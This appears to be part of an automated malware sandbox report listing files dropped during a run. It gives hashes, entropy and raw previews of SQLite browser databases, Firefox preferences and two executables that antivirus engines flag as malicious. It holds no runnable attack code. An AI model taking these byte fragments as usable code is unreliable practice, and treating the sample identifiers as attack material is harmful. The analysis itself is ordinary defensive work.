                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                        Entropy (8bit):0.03862698848467049
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
                                                                                                                                                                                                                                        MD5:507BA3B63F5856A191688A30D7E2A93A
                                                                                                                                                                                                                                        SHA1:1B799649D965FF1562753A9EB9B04AC83E5D7C57
                                                                                                                                                                                                                                        SHA-256:10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
                                                                                                                                                                                                                                        SHA-512:7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                                                        MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                                                        SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                                                        SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                                                        SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9526
                                                                                                                                                                                                                                        Entropy (8bit):5.515924904533179
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
                                                                                                                                                                                                                                        MD5:4580799F1DC5720A7EC1766400E98740
                                                                                                                                                                                                                                        SHA1:92FD30F47EC545245B934EA492B3C64D5E609AA9
                                                                                                                                                                                                                                        SHA-256:57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
                                                                                                                                                                                                                                        SHA-512:C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.1221538113908904
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                                                                                                                                        MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                                                                                                                                        SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                                                                                                                                        SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                                                                                                                                        SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                                                        MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                                                        SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                                                        SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                                                        SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):363424
                                                                                                                                                                                                                                        Entropy (8bit):7.987313898927024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
                                                                                                                                                                                                                                        MD5:384A847AD2833788FA253433FD2EEA8D
                                                                                                                                                                                                                                        SHA1:1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
                                                                                                                                                                                                                                        SHA-256:DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
                                                                                                                                                                                                                                        SHA-512:BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 70%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2801664
                                                                                                                                                                                                                                        Entropy (8bit):6.704411900002309
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:UtkjTCvq/irWfqk7ibFuToinSryh3UgXUID83EIQCw6xVw6:Ut1q/IWfqk7ibFu0iL3+4wQCw6xl
                                                                                                                                                                                                                                        MD5:8C1835DABEA53E9D98E866C950CD260D
                                                                                                                                                                                                                                        SHA1:8676E818D7A45503B906FD0F3CF4B0EDAF5AC8FC
                                                                                                                                                                                                                                        SHA-256:B9B88394BC3C964540130E4B5D0A9AC339DC0BBAC35F418EAB872674D5E07AB7
                                                                                                                                                                                                                                        SHA-512:1444879EA6CFBA3ED187DB1D084425202D9789A38B87D6CC306E1DFDE4246F1C83757581DE7726788C2B2C1C95D8C2E5C19B7E2F352DF12AA6FB52211BB289BB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{.L..................".........d."......."...@...........................*.....).+.......................................".@.....#.XZ............................................................................"..............................text.....".......".................`....rdata...C...."..P....".............@..@.data...xT...0#..0...0#.............@....rsrc....`....#..`...`#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                                                        MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                                                        SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                                                        SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                                                        SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.49321266326933416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Zta2:cJhXC9lHmutpJyiRDeJ/aUKrDgnmg
                                                                                                                                                                                                                                        MD5:2BD83C7F7C7C087A227F13AED80A136D
                                                                                                                                                                                                                                        SHA1:73BAAE5D0F7F101B3858752DB5CB9735BF9344E5
                                                                                                                                                                                                                                        SHA-256:7C9C12E520CA858DE4E62724EA451D52C54180C7557A440648481F6F54B7555F
                                                                                                                                                                                                                                        SHA-512:FF41B94C1BED7834A4EB88C4D4C670FC2CDDAE29654D8E3F7322116674ADBDD6D09FCC2F58A69826042D93D55A58F69CE66EA4954F9E94AE20DD73201C2F65B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
